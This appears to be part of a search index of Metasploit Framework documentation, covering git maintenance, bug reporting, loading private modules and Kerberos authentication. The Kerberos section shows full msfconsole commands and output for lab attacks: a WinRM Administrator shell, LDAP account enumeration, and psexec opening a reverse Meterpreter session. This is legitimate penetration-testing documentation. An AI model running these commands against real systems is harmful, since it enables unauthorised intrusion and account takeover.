    "content": "Here’s a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote merged branches in date order. mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v \"HEAD -&amp;gt;\" | sed s/^..//`; do echo -e `git log -1 --pretty=format:\"%Cgreen%ci %Cblue%cr%Creset\" $k --`\\\\t\"$k\";done | sort . Count off how many you want to keep at the end, do the arithmetic, and tack on another couple pipes to catch everything that’s more than two weeks old. These are the merged branches that nobody’s likely to miss. mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v \"HEAD -&amp;gt;\" | sed s/^..//`; do echo -e `git log -1 --pretty=format:\"%Cgreen%ci %Cblue%cr%Creset\" $k --`\\\\t\"$k\";done | sort | head -45 | sed \"s/^.*origin\\///\" &amp;gt; /tmp/merged_to_delete.txt . Pull the trigger: . mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b &amp;amp;&amp;amp; git push origin :$b; done . Note that we still have our tarball, so if we need to reinstate any of these branches, just need to re-push. ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#start-deleting-old-merged-branches",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#start-deleting-old-merged-branches"
  },"755": {
    "doc": "Remote Branch Pruning",
    "title": "Repeat for the unmerged branches",
    "content": "Pretty much the same as above, but use --no-merged instead of --merged and allow for older unmerged branches (say, 2 months). ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#repeat-for-the-unmerged-branches",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#repeat-for-the-unmerged-branches"
  },"756": {
    "doc": "Remote Branch Pruning",
    "title": "Tell people about it.",
    "content": "Sometimes, some people may run into sync problems with these missing branches and need to git remote prune origin themselves. Alternatively, they want to look into these branches again – especially the unmerged ones. So, let people know that you just did this on the metasploit-hackers list and the Freenode IRC channel. If someone wants an old branch back, just go to your backup clone and push it back up as you would any branch: git checkout branchname &amp;amp;&amp;amp; git push origin branchname. No problem. ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html#tell-people-about-it",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html#tell-people-about-it"
  },"757": {
    "doc": "Remote Branch Pruning",
    "title": "Remote Branch Pruning",
    "content": "Since we have a lot of people creating and merging branches on the Metasploit GitHub repository, we need to periodically get rid of old and abandoned branches. Here’s my technique: . ",
    "url": "/docs/development/get-started/git/remote-branch-pruning.html",
    "relUrl": "/docs/development/get-started/git/remote-branch-pruning.html"
  },"758": {
    "doc": "Reporting a Bug",
    "title": "Metasploit Bug Reporting",
    "content": "Metasploit gets hundreds of issue reports every year on our issue tracker. Some issues aren’t bug reports at all, but instead requests for new features or questions about Metasploit usage. We appreciate feature or enhancement requests, and you should feel free to keep submitting those to our issue tracker. Some questions, such as whether an odd error or behavior is intended, are okay to submit to the issue tracker as well. Other questions, such as basic support requests or questions on beginning Framework usage, are better to ask the community on Slack. If you believe you have discovered a legitimate bug in Metasploit Framework, you should open a bug report on our issue tracker. The rest of this page will discuss how to submit detailed, useful bug reports so we can understand and triage your issue as quickly as possible. But first…two important exceptions to bug/issue reports. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#metasploit-bug-reporting",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#metasploit-bug-reporting"
  },"759": {
    "doc": "Reporting a Bug",
    "title": "When NOT to use Metasploit’s issue tracker",
    "content": "NOTE: There are two situations where, even if you have found what you know is a bug, you should not open a bug report on our public issue tracker. | You should not open a bug report on Metasploit Framework’s issue tracker if you are a Metasploit Pro customer. | You should not open a bug report when you have found a security issue with Metasploit itself. | . Metasploit Pro Customers . If you are a Metasploit Pro customer, you can log in to Rapid7’s customer support portal here. You are also able to reach out to your CSM or support representative if you prefer. To provide a consistent customer experience, Metasploit Framework community members, committers, and open-source developers do not offer support for commercial Rapid7 products. Rapid7’s support resources and team members are well-equipped to handle your Metasploit Pro support needs! . Security Issues . If you have a security issue with Metasploit itself, you should email [email protected] or let us know here. Rapid7’s disclosure policy is here. In general, our security teams are happy to give you credit, inform you about progress, and explore related issues with you if you’d like. They’re also happy to keep you anonymous if that’s what you prefer. All of this is significantly easier if you report security issues in a manner that lets our teams quickly work with you to understand the problem! Clear communication and coordinated disclosure give us the best chance of fixing any security issues quickly and protecting users. Now on to the good stuff! The Metasploit development community has read thousands of bug reports over the past 15 years, and a well-written bug report makes fixing bugs much faster and easier. In fact, in our experience, how quickly we can understand and fix an issue has more to do with bug report quality than the complexity of the bug itself. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#when-not-to-use-metasploits-issue-tracker",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#when-not-to-use-metasploits-issue-tracker"
  },"760": {
    "doc": "Reporting a Bug",
    "title": "General Rules",
    "content": ". | Ensure the platform you’re reporting the issue for is supported. We do not, for instance, support Termux currently. If your platform is not officially supported, the community may still have resources to help, but you should search for and ask about those outside Metasploit’s issue tracker. | When possible, it helps if you are running the latest stable version of Metasploit Framework, or the latest release of Kali, BlackArch Linux, or your other favorite security distribution that ships with Metasploit. Metasploit’s nightly installers are here and typically offer the latest Framework release. | Review our code of conduct before submitting issues. | Use a specific title so we can understand immediately which part of Metasploit is causing the unexpected behavior. “NoMethodError raised on smb_login module” is a great title. “Problem with Metasploit target” is not. | Redact any private or sensitive data, such as target IPs or URLs, passwords, or personally identifying information. | Please don’t comment on closed issues; instead, open a new issue and link to any previous relevant issues. | . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#general-rules",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#general-rules"
  },"761": {
    "doc": "Reporting a Bug",
    "title": "Information to Include",
    "content": "We ask for several different pieces of information when users report issues in Metasploit. As of June 2020, our core engineering team in Belfast is developing a debug command that will automatically give you all the information we require when you encounter an issue and then run the command in msfconsole. For now, the following information ensures that we can more effectively triage and address bugs. If you do not provide this information, it is likely that response time will be significantly longer! . Steps to reproduce . What did you do to get the results you got? Can you give us step-by-step instructions to get the same results you got? Are you able to consistently reproduce the issue in your own environment? . Which OS are you using? What do we need to know about your environment and/or target? . Tell us which operating system you’re using and any relevant information about your setup. If the module or feature you’re having trouble with requires any external dependencies, check whether they are installed, and (if not) whether installing them could solve your problem. If you’re having problems with a target (victim), tell us the target operating system and service versions.(Please ensure you’ve redacted any private or sensitive data!) If the module or feature you’re having trouble with requires any external dependencies, check whether that could solve your problem. If you’re testing a module in a lab or virtual environment, we would appreciate as much data about the target as you can provide. This means exact versions of the target including patch levels, pcaps if you can capture them, and any kind of logging inside or outside of Framework. We will often ask for the framework.log. Expected behavior . What should happen? If what you’re trying to do used to work but no longer does, what was the behavior you encountered before you ran into a problem? . Current behavior . What happens now? Please give us as many technical details as possible. Once again, we also strongly recommend that you send us any relevant logs and/or stack traces. In case you haven’t noticed by now, we absolutely love logs and screen captures, and your including them will make us happy. Metasploit version . Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install). Did you install Metasploit with… . | Kali package via apt | Omnibus installer (nightly) | Commercial installer (from https://www.rapid7.com/products/metasploit/download/) | Source install (please specify Ruby version) | . This list isn’t intended to be exhaustive - it’s simply the bare minimum set of details we need to reproduce and diagnose your bug. You should feel free to include as much detailed information as you need to help us understand how you got the results you did. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#information-to-include",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#information-to-include"
  },"762": {
    "doc": "Reporting a Bug",
    "title": "Avoid Duplicates",
    "content": "You may not be the first person to notice the problem you’re seeing as a Framework user, and the more bug reports we get, the more difficult it is to sort through them all for easy fixes or high-priority issues. Here are some ways to help a previously-reported bug get noticed more quickly and prioritized (if necessary). | Having a problem with a module? Try searching that module’s name to see if anyone else has reported (or fixed!) your problem recently. | Getting a strange error and not sure what it means? Search for the error to see if others have had or addressed the same problem you are facing. | Pro tip: Search both open and closed issues to see if what you’re reporting was resolved (in which case you might simply need to update to a later version of Metasploit) or if there’s a workaround someone else has discovered that might help you while we get to your issue. | If you DO discover that someone else has already reported the issue you’re experiencing, please do update that issue with any new information - for instance, that you’re experiencing the issue on a different OS or in a different version of Metasploit than what the original issue reports described. | If you find closed issues or resolved bugs that describe a problem you’re having on a later version of Metasploit, that could indicate a regression (old bugs that have been reintroduced). It helps us if you note this in your issue report. Fixes for regressions can be fast, so making note of possible regressions is useful. | Finally, you might find a bug that’s been rejected or closed without resolution. In many of these cases, the problem is something external to Metasploit: user error, configuration issues, known incompatibilities, etc. If you think that the original resolution was in error or incomplete, open a new issue report and refer to any related issue reports. | . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#avoid-duplicates",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#avoid-duplicates"
  },"763": {
    "doc": "Reporting a Bug",
    "title": "Other Notes",
    "content": ". | Networking is hard, as we’ve often said even among ourselves! You might want to see if your network configuration is unusual in any way, or do a regular old internet search to check whether your config might be the problem. | Antivirus frequently causes strange behavior. Ensure antivirus is disabled on your system or in any VMs where you’re using Metasploit. | GitHub pull requests frequently contain a LOT of conversation and context. If a bug already has a pull request associated with it, check the pull request conversation for other information that might be useful to you. | . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#other-notes",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#other-notes"
  },"764": {
    "doc": "Reporting a Bug",
    "title": "PRs Accepted!",
    "content": "If you’re a superhero and you figured out the root cause of a bug AND found a way to fix it, you can send your Metasploit fixes and improvements our way! The best way to get your fix into Metasploit quickly is to patch your own fork and submit a pull request to Metasploit. You get extra gratitude from all of us when you do this, and you’ll also get a shout-out in the weekly Metasploit wrap-up. You can find a guide on setting up your own Metasploit Development Environment here. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#prs-accepted",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#prs-accepted"
  },"765": {
    "doc": "Reporting a Bug",
    "title": "Public Discussion",
    "content": "Some projects and companies don’t like discussing bugs in the bug report itself. Some even have policies of not doing this. Metasploit is not one of those projects. We greatly prefer public communication over private communication because it makes community knowledge accessible and searchable to everyone. That said, if you have specific privacy or security concerns, we’re always happy to speak privately. You can get in touch with us at [email protected]. ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#public-discussion",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#public-discussion"
  },"766": {
    "doc": "Reporting a Bug",
    "title": "Resolved Bugs",
    "content": "Your bug should be considered “Resolved” once there’s a fix landed in the Metasploit-Framework master branch. People who track that branch will have the fix available quickly. It may take other distributions that include Metasploit (e.g., Kali) a few days to pull in fixes, depending on their individual release cadences. Thanks for helping us get to diagnoses and resolutions quickly and efficiently for all Framework users! . ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html#resolved-bugs",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html#resolved-bugs"
  },"767": {
    "doc": "Reporting a Bug",
    "title": "Reporting a Bug",
    "content": " ",
    "url": "/docs/using-metasploit/getting-started/reporting-a-bug.html",
    "relUrl": "/docs/using-metasploit/getting-started/reporting-a-bug.html"
  },"768": {
    "doc": "Rolling back merges",
    "title": "What’s a bad merge?",
    "content": ". | Anything that causes our GitHub Actions to fail consistently. | Anything that hits untested code that otherwise causes problems with msfconsole, msfcli, msfvenom, and other console commands. | . Sometimes, GitHub Actions might choke up, due to network weather. Every build is a fresh clone, and all gems have to be reinstalled every time. Also, some rspec tests require network connections to assets on the Internet. Sometimes, GitHub Actions servers are under a lot of load, and builds time out. The best way to diagnose these problems is simply to restart the build. Note, only Committers have rights to do this. If that doesn’t clear things up, or if it’s obvious that there are real failures (since you’ve read the rspec results and have read the tests), the first order of business is to undo your bad commit. Note: in branches other than master, you can usually just fix things normally with new commits. There are plenty of “whoops” commit messages in our history. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html#whats-a-bad-merge",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html#whats-a-bad-merge"
  },"769": {
    "doc": "Rolling back merges",
    "title": "A merge revert example",
    "content": "Once, there was a bad merge on PR #2320. The fellow landing this pull request ran into a merge conflict while landing, thought he fixed it, and pushed the results, which ended up breaking about a dozen Rspec tests. Whoops. That was a bad merge. PR #2624 fixed it. Here’s the procedure used. Check out the bad merge tip. These commands will put the local repo back to the bad merge, and create a local branch as such: . git checkout 3996557 git checkout -b bad-merge . You can inspect exactly what commits are contained in this merge with the following: . git log bad-merge...bad-merge~ --oneline . Like so: . $ git log bad-merge...bad-merge~ --oneline 3996557 Fix conflcit lib/msf/util/exe.rb 6296c4f Merge pull request #9 from tabassassin/retab/pr/2320 d0a3ea6 Retab changes for PR #2320 bff7d0e Merge for retab 4c9e6a8 Default to exe-small . The syntax is a little wacky, but this is saying, “Show me all the commit hashes that occur from the bad-merge point to one back from bad-merge (in other words, from right before bad-merge was merged). That’s what the tilde (~) means. You could also use bad-merge^ or bad-merge^1, they’re all equivalent. You can see the diff with the following command. Note the reverse placement of the bad-merge and bad-merge~ commit points! . git diff bad-merge~ bad-merge . Take a look at that, confirm that yes, this is exactly what you want to revert, and then pull the trigger. Revert the merge . git revert -m 1 bad-merge . The -m 1 bit is important, because that specifies that you want the branch to return to the point from before the merge – I have never had reason to revert a merge and throw out the other side of the merge, but I imagine it comes up often enough for other people to not have it be the default behavior. Note that this does /not/ reach into the repo and change history; for that, you would need to git push –force, and you never want to do that on the master branch. Instead, you are generating a new commit that reverses the contents of the merge commit. As usual, you will want to edit the commit message to be meaningful – mention the affected commit hash and the affected pull request. You will also want to git commit -S --amend after this to sign the commit; git revert does not take a -S option. Bummer. Create a new PR. You will now create a new PR with your revert commit. That’s simple enough. Again, be sure that the affected PRs are also informed; they may think their material landed, and while it technically did, it’s no longer there; they will need to open new PRs and figure out how to resubmit their changes (hopefully, this time without causing merge conflicts). Bug the committers until your revert lands. Until your revert commit lands, master will remain broken, so dealing with this situation should be blocking basically anything else. Be vocal. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html#a-merge-revert-example",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html#a-merge-revert-example"
  },"770": {
    "doc": "Rolling back merges",
    "title": "That’s it!",
    "content": "If you have suggestions for fixes on this page, please bother @todb-r7 with them. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html#thats-it",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html#thats-it"
  },"771": {
    "doc": "Rolling back merges",
    "title": "Rolling back merges",
    "content": "Since the Metasploit-framework repository’s master branch is the bleeding edge of development, occasionally mistakes happen. This page will attempt to give some guidance on how to roll back a bad merge. ",
    "url": "/docs/development/maintainers/process/rolling-back-merges.html",
    "relUrl": "/docs/development/maintainers/process/rolling-back-merges.html"
  },"772": {
    "doc": "Running Private Modules",
    "title": "Mirror the “real” Metasploit module paths",
    "content": "You must first set up a directory structure that fits with Metasploit’s expectations of path names. What this typically means is that you should first create an “exploits” directory structure, like so: . mkdir -p $HOME/.msf4/modules/exploits . If you are using auxiliary or post modules, or are writing payloads you’ll want to mkdir those as well. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#mirror-the-real-metasploit-module-paths",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#mirror-the-real-metasploit-module-paths"
  },"773": {
    "doc": "Running Private Modules",
    "title": "Create an appropriate category",
    "content": "Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use test or private, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example: . mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat . … if you are developing a file format exploit for Windows. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#create-an-appropriate-category",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#create-an-appropriate-category"
  },"774": {
    "doc": "Running Private Modules",
    "title": "Create the module",
    "content": "Once you have a directory to place it in, feel free to download or start writing your module. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#create-the-module",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#create-the-module"
  },"775": {
    "doc": "Running Private Modules",
    "title": "Using Python/Go modules",
    "content": "External modules, most commonly written in Python/Go, need to additionally be marked as executable in order to be loaded by Metasploit. For full details: . | Writing External Python Modules | Writing External GoLang Modules | . ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#using-pythongo-modules",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#using-pythongo-modules"
  },"776": {
    "doc": "Running Private Modules",
    "title": "Test it all out",
    "content": "If you already have msfconsole running, use a reload_all command to pick up your new modules. If not, just start msfconsole and they’ll be picked up automatically. If you’d like to test with something generic, I have a module posted up as a gist, here: https://gist.github.com/todb-r7/5935519, so let’s give it a shot: . mkdir -p $HOME/.msf4/modules/exploits/test curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/6e5d2da61c82b0aa8cec36825363118e9dd5f86b/test_module.rb % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 1140 0 1140 0 0 3607 0 --:--:-- --:--:-- --:--:-- 7808 . Then, in my msfconsole window: . msf &amp;gt; reload_all [*] Reloading modules from all module paths... IIIIII dTb.dTb _.---._ II 4' v 'B .'\"\".'/|\\`.\"\"'. II 6.P : .' / | \\ `. : II 'T;.;P' '.' / | \\ `.' II 'T; ;P' `. / | \\ .' IIIIII 'YvP' `-.__|__.-' I love shells --egypt =[ metasploit v4.6.2-2013052901 [core:4.6 api:1.0] + -- --=[ 1122 exploits - 707 auxiliary - 192 post + -- --=[ 307 payloads - 30 encoders - 8 nops msf &amp;gt; use exploit/test/test_module msf exploit(test_module) &amp;gt; info Name: Fake Test Module Module: exploit/test/test_module Version: 0 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Provided by: todb &amp;lt;[email protected]&amp;gt; Available targets: Id Name -- ---- 0 Universal Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DATA Hello, world! yes The output data Payload information: Description: If this module loads, you know you're doing it right. References: https://cvedetails.com/cve/1970-0001/ msf exploit(test_module) &amp;gt; exploit [*] Started reverse handler on 192.168.145.1:4444 [+] Hello, world! msf exploit(test_module) &amp;gt; . ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#test-it-all-out",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#test-it-all-out"
  },"777": {
    "doc": "Running Private Modules",
    "title": "Troubleshooting",
    "content": "That’s really all there is to it. The most common problems that people (including myself) run into are: . | Attempting to create a module in $HOME/.msf4/modules/. This won’t work because you need to specify if it’s an exploit or a payload or something. Check ls /opt/metasploit/apps/pro/msf3/modules/ (or where your install of Metasploit lives). | Attempting to create a module in $HOME/.msf4/modules/auxiliary/. This won’t work because you need at least one level of categorization. It can be new, like auxiliary/0day/, or existing, like auxiliary/scanner/scada/. | Attempting to create a module in $HOME/.msf4/exploit/ or $HOME/.msf4/posts/. Note the pluralization of the directory names; they’re different for different things. Exploits, payloads, encoders, and nops are plural, while auxiliary and post are singular. | . Metasploit Pro . Note that the $HOME directory for Metasploit Community Edition is going to be root and not your own user directory, so if you are expecting modules to show up in the Metasploit Pro web UIs, you will want to stash your external modules in /root/.msf4/modules. Of course, this means you need root access to the machine in question, but hey, you’re a l33t Metasploit user, so that shouldn’t be too hard. Also note that if your modules are not displaying in the web UI, you should restart Pro service. Windows . For Windows users, the above is all true, except for accessing the modules from the web GUI. Sadly, you’re a little out of luck; the module load paths on Windows are a little more restrictive and don’t allow for external modules. However, the Console2-based Metasploit Console (Start &amp;gt; Programs &amp;gt; Metasploit &amp;gt; Metasploit Console) will work out just fine. New mixins and protocols . Any module that requires on changes to core library functions, such as new protocol parsers or other library mixins, aren’t going to work out for you this way – you’re going to end up spewing errors all over the place as your module tries to load these classes. It’s possible to write modules as completely self-contained in nearly all cases (thanks to Ruby’s open class architecture), but such modules nearly always get refactored later to make the protocol and other mixin bits available to other modules. In this case, it would be better to work with modules like that using a proper GitHub checkout with a development branch – see the dev environment setup docs for tons more on that. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#troubleshooting",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#troubleshooting"
  },"778": {
    "doc": "Running Private Modules",
    "title": "A final warning",
    "content": "If you are loading new and exciting Metasploit modules, know that these things will tend to have access to anything you have access to; doubly so if you’re dropping them in root. Metasploit modules are plain text Ruby, so you can read them – but please be careful, and only add external modules from trusted sources; don’t just go grabbing any old thing you see on the Internet, because you may find yourself backdoored (or worse) in short order. ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html#a-final-warning",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html#a-final-warning"
  },"779": {
    "doc": "Running Private Modules",
    "title": "Running Private Modules",
    "content": "If you’re in the business of writing or collecting Metasploit modules that aren’t part of the standard distribution, then you need a convenient way to load those modules in Metasploit. Never fear, it’s pretty easy, using Metasploit’s default local module search path, $HOME/.msf4/modules, and there are just a couple caveats: . ",
    "url": "/docs/using-metasploit/intermediate/running-private-modules.html",
    "relUrl": "/docs/using-metasploit/intermediate/running-private-modules.html"
  },"780": {
    "doc": "Sanitizing PCAPs",
    "title": "Kali Linux",
    "content": "tcprewrite can be used to change the IP and MAC addresses. The following command will take care of both of those: tcprewrite --seed=&amp;lt;int&amp;gt; --infile=&amp;lt;infile&amp;gt; --outfile=&amp;lt;outfile&amp;gt; --dlt=enet --enet-dmac=&amp;lt;dmac&amp;gt; --enet-smac=&amp;lt;smac&amp;gt; . | seed is used to seed changes to IP address. Pick a number for here, 111 is acceptable. | dlt fixes an error: dlt_linux_ssl plugin does not support packet encoding | enet-dmac fixes the destination mac. 00:00:00:00:00:00 works | enet-smac fixes the source mac. 11:11:11:11:11:11 works | . ",
    "url": "/docs/development/get-started/sanitizing-pcaps.html#kali-linux",
    "relUrl": "/docs/development/get-started/sanitizing-pcaps.html#kali-linux"
  },"781": {
    "doc": "Sanitizing PCAPs",
    "title": "Sanitizing PCAPs",
    "content": "Before submitting a pcap to [email protected], you may choose to sanitize it. Mainly, you’ll want to change the mac addresses and IP addresses. ",
    "url": "/docs/development/get-started/sanitizing-pcaps.html",
    "relUrl": "/docs/development/get-started/sanitizing-pcaps.html"
  },"782": {
    "doc": "Authenticating to SMB/WinRM/etc",
    "title": "Service Authentication",
    "content": "Since version 6.3, Metasploit has included authentication via Kerberos for multiple types of modules. Kerberos authentication allows Metasploit users to request and utilize Ticket Granting Tickets (TGTs) and Ticket Granting Services (TGSs) to authenticate with supported modules. Metasploit uses an internal caching and storage mechanism but tickets are stored able to be both exported and imported from MIT Credential Cache (CCACHE) files. A converter for Kirbi to and from CCACHE files is also available in the auxiliary/admin/kerberos/ticket_converter module. Metasploit currently offers Kerberos authentication for the following services - see the below references for more details and examples: . | SMB Kerberos Authentication | WinRM Kerberos Authentication | LDAP Kerberos Authentication | MSSQL Kerberos Authentication | . Examples . Open a WinRM session: . msf6 &amp;gt; use auxiliary/scanner/winrm/winrm_login msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [+] 192.168.123.13:88 - Received AP-REQ. Extracting session key... [+] 192.168.123.13:5985 - Login Successful: demo.local\\Administrator:p4$$w0rd [*] Command shell session 1 opened (192.168.123.1:50722 -&amp;gt; 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\\Users\\Administrator&amp;gt; . Query LDAP for accounts: . msf6 &amp;gt; use auxiliary/gather/ldap_query msf6 auxiliary(gather/ldap_query) &amp;gt; run action=ENUM_ACCOUNTS rhost=192.168.123.13 username=Administrator password=p4$$w0rd ldap::auth=kerberos ldap::rhostname=dc3.demo.local domain=demo.local domaincontrollerrhost=192.168.123.13 [*] Running module against 192.168.123.13 [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:389 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_216797.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:389 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120714_default_192.168.123.13_mit.kerberos.cca_638903.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [*] Discovering base DN automatically [+] 192.168.123.13:389 Discovered base DN: DC=adf3,DC=local CN=Administrator CN=Users DC=adf3 DC=local ========================================== Name Attributes ---- ---------- badpwdcount 0 description Built-in account for administering the computer/domain lastlogoff 1601-01-01 00:00:00 UTC lastlogon 2023-01-23 11:02:49 UTC logoncount 159 memberof CN=Group Policy Creator Owners,CN=Users,DC=domain,DC=local || CN=Domain Admins,CN=Users,DC=domain,DC=local | CN=Enterprise Admins,CN=Users,DC=domain,DC=local || CN=Schema Admins,CN=Users,DC=domain,DC=local || CN=Adm inistrators,CN=Builtin,DC=domain,DC=local name Administrator objectsid S-1-5-21-3402587289-1488798532-3618296993-500 pwdlastset 133189448681297271 samaccountname Administrator useraccountcontrol 512 ... etc ... Running psexec against a host: . msf6 &amp;gt; use exploit/windows/smb/psexec msf6 exploit(windows/smb/psexec) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd smb::auth=kerberos domaincontrollerrhost=192.168.123.13 smb::rhostname=dc3.demo.local domain=demo.local [*] Started reverse TCP handler on 192.168.123.1:4444 [*] 192.168.123.13:445 - Connecting to the server... [*] 192.168.123.13:445 - Authenticating to 192.168.123.13:445|demo.local as user 'Administrator'... [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_474531.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:445 - 192.168.123.13:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120911_default_192.168.123.13_mit.kerberos.cca_169149.bin [+] 192.168.123.13:445 - 192.168.123.13:88 - Received a valid delegation TGS-Response [*] 192.168.123.13:445 - Selecting PowerShell target [*] 192.168.123.13:445 - Executing the payload... [+] 192.168.123.13:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 192.168.123.13 [*] Meterpreter session 6 opened (192.168.123.1:4444 -&amp;gt; 192.168.123.13:49738) at 2023-01-18 12:09:13 +0000 meterpreter &amp;gt; . Connect to a Microsoft SQL Server instance and run a query: . msf6 &amp;gt; use auxiliary/admin/mssql/mssql_sql msf6 auxiliary(admin/mssql/mssql_sql) &amp;gt; run 192.168.123.13 domaincontrollerrhost=192.168.123.13 username=administrator password=p4$$w0rd mssql::auth=kerberos mssql::rhostname=dc3.demo.local mssqldomain=demo.local sql='select auth_scheme from sys.dm_exec_connections where session_id=@@spid' [*] Reloading module... [*] Running module against 192.168.123.13 [*] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGT-Response [+] 192.168.123.13:1433 - 192.168.123.13:88 - Valid TGS-Response [*] 192.168.123.13:1433 - 192.168.123.13:88 - TGS MIT Credential Cache saved to ~/.msf4/loot/20220630193907_default_192.168.123.13_windows.kerberos_556101.bin [*] 192.168.123.13:1433 - SQL Query: select auth_scheme from sys.dm_exec_connections where session_id=@@spid [*] 192.168.123.13:1433 - Row Count: 1 (Status: 16 Command: 193) auth_scheme ----------- KERBEROS [*] Auxiliary module execution completed . Options . Kerberos authentication requires additional options to be set. Some of them are prefixed with the protocol the module is authenticating. For example, the PSexec module which operates over SMB would use the “SMB” prefix. Required options: . | ${Prefix}::Auth – The authentication modes this module supports. Set it to “kerberos” to use Kerberos authentication. i.e. Smb::Auth=kerberos | ${Prefix}::Rhostname – The hostname of the target system. This value should be either the hostname WIN-MIJZ318SQH or the FQDN like WIN-MIJZ318SQH.msflab.local. i.e. Smb::Rhostname=WIN-MIJZ318SQH.msflab.local | ${Prefix}Domain – The domain name of the target system, e.g. msflab.local. i.e. SmbDomain=msflab.local | . Optional options: . | DomainControllerRhost – The IP address or hostname of the domain controller to use for Kerberos authentication. i.e. DomainControllerRhost=192.168.123.13. If this value is not specified, Metasploit will look it up via the realm’s (the ${Prefix}Domain option) SRV record in DNS. | ${Prefix}::Krb5Ccname – The path to a CCACHE file to use for authentication. This is comparable to setting the KRB5CCNAME environment variable for other tools. If specified, the tickets it contains will be used. 